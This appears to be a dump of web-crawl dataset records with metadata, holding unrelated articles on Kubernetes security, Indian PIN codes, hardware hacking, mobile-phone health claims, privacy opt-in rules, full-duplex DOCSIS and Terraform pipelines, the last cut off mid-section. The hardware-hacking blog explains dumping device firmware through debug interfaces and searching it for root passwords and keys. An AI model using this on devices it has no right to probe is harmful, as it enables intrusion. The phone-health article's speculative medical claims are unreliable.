Dataset columns (viewer header):
- text: string, lengths 234 to 589k
- id: string, lengths 47 to 47
- dump: string, 62 values
- url: string, lengths 16 to 734
- date: string, lengths 20 to 20
- file_path: string, lengths 109 to 155
- language: string, 1 value
- language_score: float64, 0.65 to 1
- token_count: int64, 57 to 124k
- score: float64, 2.52 to 4.91
- int_score: int64, 3 to 5
Historically, the leading way to isolate and organize applications and their dependencies has been to place each application in its own virtual machine (VM). VMs make it possible to run multiple applications on the same physical hardware while keeping conflicts among software components and competition for hardware resources to a minimum. But virtual machines are bulky, typically gigabytes in size, and they don't really solve the problems of portability, software updates, or continuous integration and continuous delivery. To resolve these issues, organizations have adopted Docker containers, which make it possible to isolate applications into small, lightweight execution environments that share the operating system kernel. Typically measured in megabytes, containers use far fewer resources than virtual machines and start up almost immediately.

In the past, applications were deployed by installing them on a host using the operating system package manager. This had the disadvantage of entangling the applications' executables, configuration, libraries, and life cycles with each other and with the host OS. It was possible to build immutable VM images to achieve predictable rollouts and rollbacks, but VMs are heavyweight and non-portable. These days, organizations deploy containers based on operating system-level virtualization rather than hardware virtualization. Containers are isolated from each other and from the host: they have their own file systems, they can't see each other's processes, and their computational resource usage can be bounded. They are easier to build than VMs, and because they are decoupled from the underlying infrastructure and the host filesystem, they are portable across clouds and OS distributions.

Containers are also small and fast, so one application can be packed into each container image. This one-to-one application-to-image relationship unlocks the full benefits of containers. Similarly, immutable container images can be created at build/release time rather than at deployment time, since each application doesn't need to be composed with the rest of the application stack or married to the production infrastructure environment. Generating container images at build/release time enables a consistent environment to be carried from development into production. Containers are also much more transparent than VMs, which facilitates monitoring and management. This is especially true when the containers' process life cycles are managed by the infrastructure rather than hidden by a process supervisor inside the container.

Enter Kubernetes. This open source container orchestration system for automating deployment, scaling, and management of containerized applications was designed by Google and is now maintained by the Cloud Native Computing Foundation. It aims to provide a platform for automating deployment, scaling, and operations of application containers across clusters of hosts. At its most basic level, Kubernetes is a system for running and coordinating containerized applications across a cluster of machines. It is designed to manage the complete life cycle of containerized applications and services using methods that provide predictability, scalability, and high availability. The need to move to the cloud for scalability and availability has spurred the adoption of containerized development technologies, which in turn has driven the spectacular growth and adoption of Kubernetes as an enabling platform. The central component of Kubernetes is the cluster.
A cluster is made up of many virtual or physical machines that each serve a specialized function, either as a master or as a node. Each node hosts groups of one or more containers (which contain your applications), and the master communicates with nodes about when to create or destroy containers. At the same time, it tells nodes how to re-route traffic based on new container alignments.

As a Kubernetes user, you can define how your applications should run and the ways they should be able to interact with other applications or the outside world. You can scale your services up or down, perform graceful rolling updates, and switch traffic between different versions of your applications to test features or roll back problematic deployments. Kubernetes provides interfaces and composable platform primitives that allow you to define and manage your applications with high degrees of flexibility, power, and reliability.

But such spectacular growth in innovation is outpacing current security measures and controls, rendering existing security solutions ineffective. Cloud-native apps require a new approach. Many software developers lack the security knowledge needed to secure all of these containers in the cloud. In fact, vulnerabilities can be introduced at any point in the development life cycle, while unsecured or unreviewed code can easily be deployed into production, leaving applications and data at risk. At the end of the day, these containers are public-facing and enclose all types of sensitive data, and compliance with privacy and regulatory frameworks demands a portfolio of security tools that can help manage compliance within DevOps. This new paradigm is often formulated as DevSecOps, once again highlighting the need to converge security with the several stages of the software development and release life cycle.

The best way to achieve this is to deploy an end-to-end Kubernetes security platform that monitors clusters for anomalies while securing the developed applications against all sorts of known and unknown attacks. The rapid pace of application deployment and the highly automated runtime environment enabled by tools such as Kubernetes make it critical to consider runtime Kubernetes security automation for all business-critical applications. If you have any questions about securing Kubernetes, contact us today to help you out with your performance and security needs.

This article originally appeared at Container Journal on March 9, 2020.
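As a concrete, hypothetical illustration of the scale-up and rolling-update workflow described in this article, here is a minimal Python sketch using the official Kubernetes client library; the Deployment name, namespace, image tag, and replica count are assumptions for illustration, not part of the original article.

```python
# Minimal sketch: scale an existing Deployment and trigger a rolling update
# by bumping its container image. Assumes kubectl credentials are already
# configured locally and that a Deployment named "web" exists in "default".
from kubernetes import client, config

config.load_kube_config()   # reads ~/.kube/config
apps = client.AppsV1Api()

# Scale the Deployment to 5 replicas.
apps.patch_namespaced_deployment_scale(
    name="web",
    namespace="default",
    body={"spec": {"replicas": 5}},
)

# Roll out a new image version; Kubernetes replaces Pods gradually,
# which is the "graceful rolling update" behavior described above.
apps.patch_namespaced_deployment(
    name="web",
    namespace="default",
    body={"spec": {"template": {"spec": {"containers": [
        {"name": "web", "image": "registry.example.com/web:1.2.0"}
    ]}}}},
)
```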
<urn:uuid:4de94023-7f6f-44ba-8763-baabb3dc2aa4>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/securing-kubernetes-and-the-container-landscape/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00251.warc.gz
en
0.9331
1,112
3.203125
3
PIN Code Explained - What does the PINCODE (Postal Index Number) mean?

The Postal Index Number (PIN code) is an important part of any address in India. But why is it important, and how does it help the postal department? Here is how to make sense of the 6-digit PIN code.

What does the PIN code (Postal Index Number) mean? Why do the postal department and courier firms ask you to write the PIN code of the addressee? Why is it so important?

The Postal Index Number (PIN) or PIN code is a 6-digit post office numbering code used by India Post. The PIN was introduced on August 15, 1972. There are 9 PIN regions in the country: the first 8 are geographical regions and the digit 9 is reserved for the Army Postal Service. The first digit indicates one of the regions. The second digit indicates the sub-region, or one of the postal circles (states). The third digit indicates a sorting/revenue district. The last 3 digits refer to the delivery post office.

The first digit of the PIN indicates the following:

| First Digit | Region | States Covered |
| 1 | Northern | Delhi, Haryana, Punjab, Himachal Pradesh and Jammu & Kashmir |
| 2 | Northern | Uttar Pradesh and Uttaranchal |
| 3 | Western | Rajasthan and Gujarat |
| 4 | Western | Maharashtra, Madhya Pradesh and Chhattisgarh |
| 5 | Southern | Andhra Pradesh and Karnataka |
| 6 | Southern | Kerala and Tamil Nadu |
| 7 | Eastern | West Bengal, Orissa and North Eastern |
| 8 | Eastern | Bihar and Jharkhand |
| 9 | APS | Army Postal Service |

The first 2 digits of the PIN indicate the following:

| First 2 Digits of PIN | Circle |
| 12 and 13 | Haryana |
| 14 to 16 | Punjab |
| 18 to 19 | Jammu & Kashmir |
| 20 to 28 | Uttar Pradesh and Uttaranchal |
| 30 to 34 | Rajasthan |
| 36 to 39 | Gujarat |
| 40 to 44 | Maharashtra |
| 45 to 49 | Madhya Pradesh and Chhattisgarh |
| 50 to 53 | Andhra Pradesh & Telangana |
| 56 to 59 | Karnataka |
| 60 to 64 | Tamil Nadu |
| 67 to 69 | Kerala |
| 70 to 74 | West Bengal |
| 75 to 77 | Orissa |
| 80 to 85 | Bihar and Jharkhand |
| 90 to 99 | Army Postal Service (APS) |

For example, if the PIN code is 500072, then 5 indicates the Southern region and 50 indicates Telangana. 500 indicates the district of Rangareddy/Hyderabad, and the last 3 digits (072) indicate the KPHB Colony post office in this area. That is how the postal department sorts incoming mail and routes it to the correct post office.
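As a worked illustration of the decoding rules above, here is a minimal Python sketch; the region lookup mirrors the first table, and the function itself is only illustrative, not an official India Post utility.

```python
# Minimal sketch: split a 6-digit Indian PIN code into the parts described above
# (region / circle prefix / sorting district / delivery post office).
REGIONS = {
    "1": "Northern", "2": "Northern", "3": "Western", "4": "Western",
    "5": "Southern", "6": "Southern", "7": "Eastern", "8": "Eastern",
    "9": "Army Postal Service",
}

def decode_pin(pin: str) -> dict:
    if len(pin) != 6 or not pin.isdigit():
        raise ValueError("a PIN code is exactly 6 digits")
    return {
        "region": REGIONS[pin[0]],        # first digit: one of 9 regions
        "circle_prefix": pin[:2],         # first two digits: postal circle
        "sorting_district": pin[:3],      # first three digits: sorting district
        "delivery_post_office": pin[3:],  # last three digits: delivery post office
    }

print(decode_pin("500072"))
# {'region': 'Southern', 'circle_prefix': '50', 'sorting_district': '500',
#  'delivery_post_office': '072'}
```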
<urn:uuid:36594608-809c-4ce0-ba01-b01bfd1ab306>
CC-MAIN-2022-40
https://www.knowledgepublisher.com/article/1254/pin-code-explained-what-does-the-pincode-postal-index-number-mean.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00251.warc.gz
en
0.764353
687
3.734375
4
Hardware hacking is the process of taking a physical piece of hardware, taking it apart to see what makes it tick, and then either modifying it to make something new or using the gained knowledge to exploit weaknesses in the hardware design. Entire communities have been built upon this process (a large one is the maker community), and now it's time to join them!

First, a brief history lesson

Before we dive into how to hack hardware, the different components, and the process of hacking it, a basic understanding of the physics of electricity is necessary. (Note: this is a very quick and dirty lesson on electricity, and there is always more to learn.)

First off we have voltage: voltage is the difference in electrical potential energy between two points.

V = I * R

Above is Ohm's law, which states that voltage (V) equals current (I) times resistance (R), both of which I will get to soon. What's important to understand is that circuits have a certain amount of voltage that needs to be supplied in order for them to operate; this is called the bias voltage. A circuit's documentation will also specify an operating range for the voltage at which it is safe to run the parts.

Resistance is what it sounds like: it is how resistant a material is to transferring an electric charge, and it is measured in ohms. Current is how much charge is flowing through the circuit and is measured in amperes (or amps for short). The importance of these two values goes hand in hand, because certain parts run better with higher or lower currents (some parts explode when you run too much current through them). Ohm's law can be rearranged to tell you the values you need to know:

I = V/R
R = V/I

In Ohm's law, delta V (change in voltage) can be substituted for V to figure out resistor values (I will explain resistors more when I talk about components). Let's talk about an LED. An LED has a bias voltage of 2.2 V and safely operates at 20 mA (0.02 A). If you wanted to power it safely from a 3.3 V power supply, you can calculate the resistor value you would need as follows (the math assumes two significant figures):

R = (3.3 - 2.2) / 0.02
R = 55 ohms

Congrats, you just figured out you need a 55 ohm resistor.

Components and tools

Now that you have learned some basic physics, it's time to move on to the tools you will need to hack some hardware. Starting with a list of tools:
- Multimeter: Used to measure voltage, resistance and current
- Soldering iron: Used to assemble/disassemble circuits
- Breadboards: Used to prototype circuits
- Bus Pirate: Can be used for a slew of things like OCD (On-Chip Debugger), SPI (Serial Peripheral Interface), JTAG (named after the group that developed it; another programming/debugging interface), and ISP (In-circuit Serial Programmer) (these will be introduced more in Level 2)

Moving on to a list of components and what they do:
- LED: Light Emitting Diode
- Resistor: Raises resistance in a circuit
- Capacitor: Charges and discharges at a given interval, used to lessen demand on a power supply
- IC: Integrated circuit. What most people think of as "chips"
- EEPROM (Electrically Erasable Programmable Read-Only Memory): Embedded devices use these as a means of storage
- Timer: Oscillates at a given frequency
- Microcontrollers: Tiny little computers. Sometimes they are just CPUs (Central Processing Units); other times they include RAM and flash storage. Popular platforms are..
- Crystals: Oscillate at a given frequency, similar to a timer
- Transformers: Used to convert between voltage levels
- Diodes: Used to limit current flow to one direction

Level 0: Baby Steps

Before you go taking apart any devices or adding on to them, it's first important to understand how to build your own devices. I suggest starting with an Arduino Nano (at the time of writing, a pack of 3 Nanos is 13-14 dollars on Amazon). From there you can use a resistor, an LED, and some jumper wires to build a circuit which you can program to blink. As simple as this may seem, it is a perfect beginner's project into the world of digital electronics. From this you have already learned the following:
- How to program a microcontroller
- How to build a simple circuit
- Prototyping on a breadboard
each of which is an extremely valuable skill for hardware hacking. In this step, I am not going to re-write something that I think the Arduino foundation has already written extremely well and in detail. Follow the steps in the following tutorial to get started with Arduinos.

Level 1: Taking apart/building upon other circuits

Hopefully by now you have made a few different Arduino programs to control various circuits of your design. (See the link above!) Now it is time to move along to the next steps of the hardware hacking process. The first thing you want to do when looking at an unknown circuit is to start looking for any ICs. If you find them, chances are they will have some kind of text on them, generally the part number for that IC. As soon as you identify the part number, Google it! If you're lucky, you will find documentation about that IC. Reading through IC documentation can seem scary, but begin by finding the following tidbits of information:
- Operating voltage
- Pin-outs (what certain pins on a microcontroller/IC are used for)
- Operating currents
- What the IC is used for
Figuring out those things can help you to figure out more about what the individual parts of a circuit are doing. From there you can start to mod the circuit. For example, say you wanted to make your TV remote rechargeable. You could just buy rechargeable batteries, or you could measure the output voltage of the batteries in the remote and then build in a LiPo battery pack with USB charging capabilities. Is this easier? No. More educational and fun? Yes. Another somewhat easy hardware hacking project would be to create modded video game controllers. (Just be sure not to cheat when playing online.) To mod a video game controller, all you would need to do is measure the operating voltage using a multimeter and then program and wire up a microcontroller (that operates at an appropriate voltage) to various inputs on the controller to simulate user interaction. Now you have a DIY controller mod chip!

Level 2: Attacking the hardware

Okay, so the majority of the blog thus far has talked about modding and building onto hardware, which is fun and has its own uses. Now let's talk about going on the attack and violating the security of the hardware (using some simpler attack vectors). After going through and determining the various ICs in the circuit for the device you are planning on attacking, you can create a plan of attack. When looking at the circuit, you may be able to identify things called test pads on the PCB (Printed Circuit Board). Test pads are used by manufacturers to automate testing of device PCBs in the factory, but sometimes debug interfaces are left enabled in production devices.
This is done to allow for debugging on a device returned because of hardware malfunctions. The problem with this is that it gives attackers the potential ability to dump device firmware and begin the software reverse engineering process. You may be wondering what I mean by debugging interfaces. Earlier, I said I would talk more about SPI, JTAG, and ISP: those are examples of different hardware communication protocols which sometimes can be used for debugging. You can connect to one of these interfaces by determining which pads correspond to which wire in the communication protocol standard (sometimes they are labeled; other times you need to use something like a logic analyzer to determine what is what), soldering a jumper wire from the pad to a breadboard, hooking it up to the correct corresponding pin of a Bus Pirate, and then running the correct tools. If the embedded device you are trying to hack happens to have an EEPROM module, you can also use a Bus Pirate to extract the contents of the EEPROM. After extracting the contents of the EEPROM, you can run a command line tool like binwalk on the bin file to search for any embedded filesystems. A common thing to see in embedded devices is Linux with some kind of read-only filesystem like SquashFS. Using binwalk, you can extract these artifacts and then start to search through the device for weaknesses (root passwords, encryption keys, etc.).

As an ending note for Level 2, there are more complicated hardware attacks that can be performed against embedded devices, but I am not going to cover them because I cannot afford the hardware necessary to perform some of them; besides, the explanation for some of them is large enough to fill up its own blog post. Now go out there and hack some hardware!

With love and root shells – wolfshirtz
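To make the firmware-extraction step from Level 2 a little more concrete, here is a minimal, hypothetical Python sketch that shells out to binwalk and then looks through whatever it extracted; the dump filename and the "interesting file" patterns are assumptions for illustration only.

```python
# Minimal sketch: extract an EEPROM/flash dump with binwalk and scan the
# result for files that often matter when hunting for weaknesses.
import os
import subprocess

FIRMWARE = "firmware.bin"  # hypothetical dump pulled off the device
INTERESTING = ("passwd", "shadow", ".pem", ".key", "id_rsa")

# "binwalk -e" carves out anything it recognizes (SquashFS, gzip, etc.)
# into an extraction directory next to the input file.
subprocess.run(["binwalk", "-e", FIRMWARE], check=True)

for root, _dirs, files in os.walk(f"_{FIRMWARE}.extracted"):
    for name in files:
        if any(tag in name for tag in INTERESTING):
            print("worth a look:", os.path.join(root, name))
```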
<urn:uuid:9cd7cb1c-4e47-4168-9d36-60e471e49d20>
CC-MAIN-2022-40
https://cryptokait.com/2020/07/17/breaking-boards-hacking-hardware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00251.warc.gz
en
0.935599
1,932
3.65625
4
Medical experts are now reporting that smartphones are leading to physical changes in the human body. Although many cellular operators have been citing studies suggesting that the use of mobile devices such as cell phones is safe for human health, medical experts are indicating that changes are occurring in the bodies of people who use these gadgets. Among the changes that medical experts have pointed out are those made to the metabolism.

According to Maulana Azad Medical College radiation oncology professor Manoj Sharma, "Cancer is not the only health issue linked to mobile phones. Fatigue, sleep disorder, lack of concentration and poor digestion have been found to be linked with mobile phone usage." Sharma spoke at the India International Center, where there was a discussion on "Mobile Phone Radiation and Health". Sharma pointed out that there had not been any solid research on the long-term health impacts of mobile devices. He discussed the idea that the close proximity of a cellular phone to the brain while it is being used could increase the risk of developing a brain tumor. "There doesn't seem to be any worry about the looming disaster. If we don't take care now it will be too late like in the case of tobacco," he said. He went on to say that he feels mobile operators in India should use technology similar to that being used in the United States, which reduces the radiation exposure of the human body from smartphones.

At the event, another Maulana Azad College professor, Naresh Gupta, added that "It is true that the metabolism in the body is affected by using mobile phones." He explained that these gadgets are an evolving technology and that the majority of the research conducted on their health impacts was funded by the private companies that manufacture those devices in the first place. "We don't have any independent research."

That said, it was also pointed out by All India Institute of Medical Sciences (AIIMS) plastic surgeon S.B. Gogia that mobile devices could also have a positive impact on health, if the indirect benefits of these gadgets are considered. He said that there have been many situations in which "lives have been saved in case of accidents and other medical emergencies due to mobile phones."
<urn:uuid:5575cef4-1ac5-455a-8ed0-1943502b8896>
CC-MAIN-2022-40
https://www.mobilecommercepress.com/mobile-devices-can-cause-metabolic-changes-people/8513661/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00251.warc.gz
en
0.972735
484
3.25
3
The last few years have seen a phenomenal revolution in digital spaces, which has completely transformed the way businesses deal with advertising, marketing, or any kind of data sharing. Further, most major privacy laws worldwide, such as the CCPA (California's Consumer Privacy Act) or Europe's GDPR (General Data Protection Regulation), now demand that companies prioritize data privacy during specific data collection and processing efforts. This creates a need for easy and effective mechanisms on websites that offer users a simple means to give consent (also known as an "opt-in") or refuse consent (also known as an "opt-out"), and to withdraw their consent at any point in time.

Data protection laws like GDPR and CCPA have given a lot of traction to the concepts of opt-in and opt-out, making it difficult to share or use people's data without their consent unless there is another lawful basis. Opt-in and opt-out are two mechanisms that have become quite popular for handling the consent requirements of the GDPR. This blog aims to explore the concept of opt-in vs. opt-out in more detail, including what they entail, their real-life use cases, and when/how to use them for data processing.

What is Opt-In?

Opt-in essentially means that users offer their consent by taking an affirmative action. In simple words, the purpose of opt-in is to give permission or accept something. One of the most common ways businesses implement opt-in methods is through checkboxes. When given the option of a checkbox, the user must take action to check the box, which signifies their consent.

What is implied by Opt-Out Privacy Consent?

As the term suggests, opt-out primarily means that users take a desired action to withdraw their consent. In simple words, opt-out refers to the act of users withdrawing or refusing consent in response to a particular event/process. For example, here is how a global brand uses a pop-up opt-in banner to gain explicit consent from their users:

Opt-in and Opt-out Real-Life Use Cases

This section explores some real-life use cases for opt-in or opt-out options and how each of these is implemented:

- Using cookies: Many companies today use third-party cookies for analytical and advertising purposes. In such a case, explicit consent is requested from users by providing them with a simple and clear opt-in/opt-out option. How can you do this? You can implement an opt-in option here using cookie consent banners. Likewise, users must be given an option to withdraw or reject the usage of cookies should they deem fit. Cookie banners should either have a reject option or a link to manage cookies, where users can choose what type of cookie they don't want stored on their device.

- Collecting personal data: Another common use case for opt-in is when you collect users' personal data, including special categories of data, and when legal/contractual obligations, legitimate/public interest, or other legal bases for processing are not applicable. How can you do this? There are several opt-in methods you can choose to request user consent, including opt-in buttons or links, consent forms in emails, paper forms, oral consent, yes/no options, preference dashboard settings, or opt-in boxes on paper or electronically. Similarly, users also have the complete right to refuse the collection/processing of their data if they deem fit. In such cases, you need to either delete the data or temporarily terminate data processing.
To implement this, you can include a contact point or a link for submitting consent opt-out requests.

- Collecting email addresses for newsletters and other marketing purposes: Often, businesses require the email addresses of their users to send them newsletters or other marketing updates. In such a scenario, it is necessary to seek their permission before storing their email IDs in your database. How can you do this? The best ways to implement opt-in options here include using website footers, inserting checkboxes at the end of forms and on business blog posts, or through emails sent to the customers. Likewise, if users feel the need to stop receiving such content at their email addresses, they should be able to easily unsubscribe via an unsubscribe link in the emails or on the website.

How Opt-in/Opt-out Are Related to GDPR and CCPA

Opt-in under GDPR
As per the GDPR guidelines, personal data processing can only be performed after procuring consent from the related individuals. Getting GDPR consent is a must only when a business processes the sensitive data of its users. This includes genetic/biometric data, racial or ethnic origin, health data, political opinions, sexual orientation, religious or philosophical data, etc. To be able to process any such sensitive personal information, businesses need to take explicit consent from their users via opt-in or other suitable methods. Opt-in under the GDPR primarily applies to any organization operating within the EU, and to any organization outside of the EU offering goods or services to customers in the EU; since the GDPR applies to organizations established both inside and outside the EU, the opt-in mechanism is applicable in both cases.

Opt-out under CCPA
Under the CCPA, consumers have the right to opt out and stop businesses from selling their personal information. All organizations complying with the CCPA need to follow clearly defined policies to provide consumers with their right to opt out of the sale of their personal information. The CCPA also requires all businesses to have either a link or a button stating "Do Not Sell My Personal Information".

There are multiple circumstances where using an opt-in method is more appropriate than using an opt-out method, and vice versa. However, it is important to remember that since privacy laws aren't the same everywhere, it is always a best practice to adhere to the strictest legislation to the extent possible. From a business perspective, it is a safer approach to employ both opt-in and opt-out options as needed to ensure customers' privacy needs and fulfillment of the law. The need is to understand that it is not simply about complying with the law but about respecting your users by giving them more autonomy and control over the privacy of their personal information. For further help, Secuvy offers a Universal Consent Management Platform to streamline consent management for businesses.
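To make the cookie-consent use case above concrete, here is a minimal, hypothetical sketch using Flask; the cookie names, routes, and lifetimes are illustrative assumptions, not a complete GDPR/CCPA implementation.

```python
# Minimal sketch: only set a non-essential (analytics) cookie after the user
# has explicitly opted in, and honor an opt-out by removing it again.
from flask import Flask, make_response, redirect, request

app = Flask(__name__)

@app.route("/")
def index():
    if request.cookies.get("consent") == "granted":
        resp = make_response("Welcome back (analytics enabled).")
        resp.set_cookie("analytics_id", "abc123", max_age=60 * 60 * 24 * 30)
    else:
        # No recorded opt-in: serve the page with strictly necessary cookies only.
        resp = make_response("Welcome. Please choose whether to accept analytics cookies.")
    return resp

@app.route("/consent/<choice>")
def consent(choice: str):
    resp = make_response(redirect("/"))
    if choice == "opt-in":
        resp.set_cookie("consent", "granted", max_age=60 * 60 * 24 * 180)
    else:  # opt-out, or withdrawing consent at any later time
        resp.set_cookie("consent", "denied", max_age=60 * 60 * 24 * 180)
        resp.delete_cookie("analytics_id")
    return resp
```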
<urn:uuid:08410bdb-5554-4f7f-b5cd-7ffba6e698bc>
CC-MAIN-2022-40
https://secuvy.ai/blog/opt-in-vs-opt-out-privacy-rights/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00251.warc.gz
en
0.913188
1,484
2.8125
3
Written by John Holobinko, Director Access Strategy, Cable Access Business Unit

Traditional cable access systems can only transmit data in one direction across any part of the spectrum. Compared to PONs, a cable access network is severely limited in the maximum symmetrical data speed it can support, usually under 200 Mbps. What if spectrum were no longer dedicated to a single direction, but instead supported data transmission in both directions simultaneously? The technology for doing this is being developed now, and Cisco is at the forefront of this breakthrough.

FDX is a new technology that enables simultaneous downstream and upstream communications over the same cable RF spectrum. With FDX, D3.1 channels can be transmitted simultaneously in both directions without data throughput loss in either direction. FDX is being developed primarily for N+0 plant architectures, i.e., systems where there are only optical nodes followed by passive coax with no amplifiers.

The biggest challenge in bidirectional transmission on the same frequencies is how to recognize return path signals at the point where they are at their lowest RF level while forward path signals on the same frequencies are at their highest level. The point in the network where this occurs is at each optical node output/input port. In an N+0 network the output level of the highest forward path carriers can be over 60 dBmV. In contrast, the received carriers from cable modems can be 10 dBmV. If you think of only the return path, this means that there is a somewhat coherent "noise" level, represented by the forward path signals, that is virtually 50 dB greater than the signal level! Knowing the forward path signal and using digital subtraction, you can remove this unwanted forward path "noise" to recover the return path signal.

If this were the only thing required, FDX would be easy. However, when forward path signals leave the node and reach the first coaxial cable tap, they are reflected back towards the node. Assume the best taps provide 25 dB of return loss. If there is 2.5 dB of cable loss to the first tap, that means the reflected signal is 60 dBmV - 2.5 dB - 25.0 dB - 2.5 dB = 30 dBmV, compared to a return path modem signal of 10 dBmV! We are used to measuring the signal to noise ratio as a positive number. In this case, the relative SNR is a negative 20 dB! Consider that there are many reflections at various frequencies. This makes recovery of the return path signals far more complicated.

FDX technology uses powerful digital signal processing algorithms to derive the return path signal from forward path signals and reflections, and Cisco has led the CableLabs effort in contributing technology for the FDX standard. Based on cable modem output signal power limitations, the standard currently defines symmetrical operation up to 684 MHz. FDX supports traditional cable modems and FDX modems in the same network simultaneously. Therefore, supporting the FDX standard requires a node-based Remote PHY and requires that the node return path gain sections support 700 MHz bandwidth operation. Cisco is currently developing an FDX-capable node based on its 1.2 GHz GS7000 super high output node technology. Customers with existing GS7000 nodes will be able to upgrade these nodes to Remote PHY and FDX.
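For readers who want to reproduce the tap-reflection arithmetic above, here is a small Python sketch using the same illustrative figures from the article (60 dBmV forward level, 2.5 dB cable loss, 25 dB tap return loss, 10 dBmV upstream level).

```python
# Reproduces the reflection calculation described above (levels in dBmV, losses in dB).
forward_tx = 60.0    # forward-path carrier level at the node output
cable_loss = 2.5     # coax loss from node to first tap (each direction)
return_loss = 25.0   # tap return loss
upstream_rx = 10.0   # received cable-modem level at the node

reflection = forward_tx - cable_loss - return_loss - cable_loss   # 30.0 dBmV
relative_snr = upstream_rx - reflection                           # -20.0 dB

print(f"reflected forward signal: {reflection:.1f} dBmV")
print(f"wanted upstream signal:   {upstream_rx:.1f} dBmV")
print(f"relative SNR:             {relative_snr:.1f} dB")
```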
<urn:uuid:49458815-0181-433d-9c91-e28466ecb7c7>
CC-MAIN-2022-40
https://blogs.cisco.com/sp/lifting-the-veil-on-full-duplex-docsis
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00251.warc.gz
en
0.927608
683
2.703125
3
Terraform is an open-source IaC tool created by HashiCorp to provision infrastructure, and it brings many benefits to the management and operation of your environment. Its flexibility, declarative language, and the productivity gains of using the same Infrastructure as Code (IaC) tooling across different cloud providers have made Terraform one of the most popular tools for infrastructure provisioning. Automating Terraform delivery while ensuring proper security and mitigating common risks and errors is one of the main goals across our DevOps teams. The main security considerations discussed in this post are also covered in AWS DevOps training.

What is Terraform?

Terraform is a tool for building, changing, and versioning infrastructure safely and efficiently. Terraform can manage existing and popular service providers as well as custom in-house solutions. Configuration files describe to Terraform the components needed to run a single application or your entire datacenter. It generates an execution plan describing what it will do to reach the desired state, and then executes it to build the described infrastructure. Terraform can determine what changed and create incremental execution plans that can be applied as the configuration changes. The infrastructure Terraform can manage includes low-level components such as storage, compute instances, and networking, as well as higher-level components like SaaS features, DNS entries, and so on.

Features of Terraform

The key features of Terraform are:
- Infrastructure as Code: Infrastructure is described using a high-level configuration syntax. This allows a blueprint of your datacenter to be versioned and treated as you would any other code. It can also be shared and re-used.
- Execution Plans: Terraform has a planning step where it generates an execution plan. The execution plan shows what Terraform will do when you choose to apply. This lets you avoid any surprises when Terraform manipulates the infrastructure.
- Resource Graph: Terraform builds a graph of all your resources and parallelizes the creation and modification of any non-dependent resources. This way, Terraform builds the infrastructure as efficiently as possible, and operators get insight into the dependencies in their infrastructure.
- Change Automation: Complex changesets can be applied to your infrastructure with minimal human interaction. Using the previously mentioned execution plan and resource graph, you know exactly what Terraform will change and in what order, avoiding many possible human errors.

Why is a Secure Terraform Pipeline required?

The objective is to create a process that allows a user to introduce changes into a cloud environment without having explicit permissions for manual actions. The process is as follows:
- A change is reviewed and merged with a pull request after approval from the required reviewers. There is no other way to introduce the change.
- The change is deployed to a test environment. Before that, the Terraform plan is reviewed manually and approved.
- The change must be tested/approved in the test environment.
- The Terraform plan is approved for the staging environment, and the change is exactly the same as in the test environment.
- Terraform changes are applied to staging using a designated Terraform system account.
There is no other way to use this Terraform account than in this step of the process.
- Follow a similar procedure to promote changes from staging to the production environment.

Environments (dev/uat/stage/prod) have a proper degree of separation ensured:
- Different system accounts are used for Terraform in these environments. Each Terraform system account has permissions only for its own environment.
- Network connectivity is limited between resources across different environments.
- Only a designated set of agents deployed in a dedicated virtual network is allowed to change the infrastructure (execute Terraform) and access sensitive resources (for example the Terraform backend, key vaults, and so on). It is not possible to release using a non-prod build agent.
- There is a way to ensure that the Terraform configuration is as similar as possible between environments.
- Terraform backends in higher environments (for example UAT) aren't accessible from local machines. They can be accessed from build machines and optionally from designated bastion hosts.
- A change to a higher environment can be deployed only if it was previously tested in a lower environment. There is a procedure to ensure that this is the very same Git revision that was tested. The change can only be introduced with a pull request with a required review process.
- The option to apply Terraform changes is granted only after a manual Terraform plan review and approval in each environment.

System Accounts for Terraform
- Terraform runs with a system account rather than a user account whenever possible. Different system accounts are used for:
  - Terraform (a system user that changes the infrastructure),
  - Kubernetes (a system user that Kubernetes uses to create required resources, for example load balancers, or to download Docker images from the repository),
  - Runtime application components (as compared to build-time or release-time components).
- System accounts that are allowed to make Terraform changes can be used only in designated CD pipelines. It is not possible to use a Terraform system account in a newly created pipeline without permission.
- Access to the Terraform system account is granted just in time for the release. Alternatively, the system account is granted permissions only for the duration of the deployment.
- System accounts in higher environments have permissions limited to only what is required to execute operations.
- Limit permissions to only the types of resources that are used.
- Remove permissions for deleting critical resources (for example databases, storage) to avoid automated re-creation of these resources and losing data. Special permissions should be granted just in time in such cases.

Having a common Terraform backend is the first step to building a pipeline. A Terraform backend is the main component that handles shared storage, execution, and locking, to prevent infrastructure modification by multiple concurrent Terraform processes.
- As initial documentation:
  - Terraform Backend Configuration
  - AWS S3
  - Azure storage account
  - backend providers list
  - GCP cloud storage
  - Remote backend for Terraform Cloud/Enterprise
- Ensure that the backend infrastructure has sufficient protection.
State files will contain all data that passes through Terraform (secrets, passwords, keys, and so forth).
- The backend will most likely be Google Cloud Storage, AWS S3 + DynamoDB, or an Azure Storage Account.
- Separate the infrastructure (network + RBAC) of production and non-prod backends.
- Plan to block access to state files (network access and RBAC) from outside of a designated network.
- Do not keep the Terraform backend infrastructure in the runtime environment. Use separate accounts/projects/subscriptions and so on.
- Enable object versioning/soft delete options on your Terraform backends to avoid losing changes and state files, and to maintain Terraform state history.

In some exceptional cases, manual access to Terraform state files will be necessary. Things like breaking changes, fixing defects, or refactoring will require operations staff to run Terraform state operations. For such occasions, plan special, controlled access to the Terraform state using bastion hosts, VPN, and so on. By using Terraform Cloud/Enterprise with a remote backend, the tool will take care of the state storage requirements.

Divide Into Multiple Projects

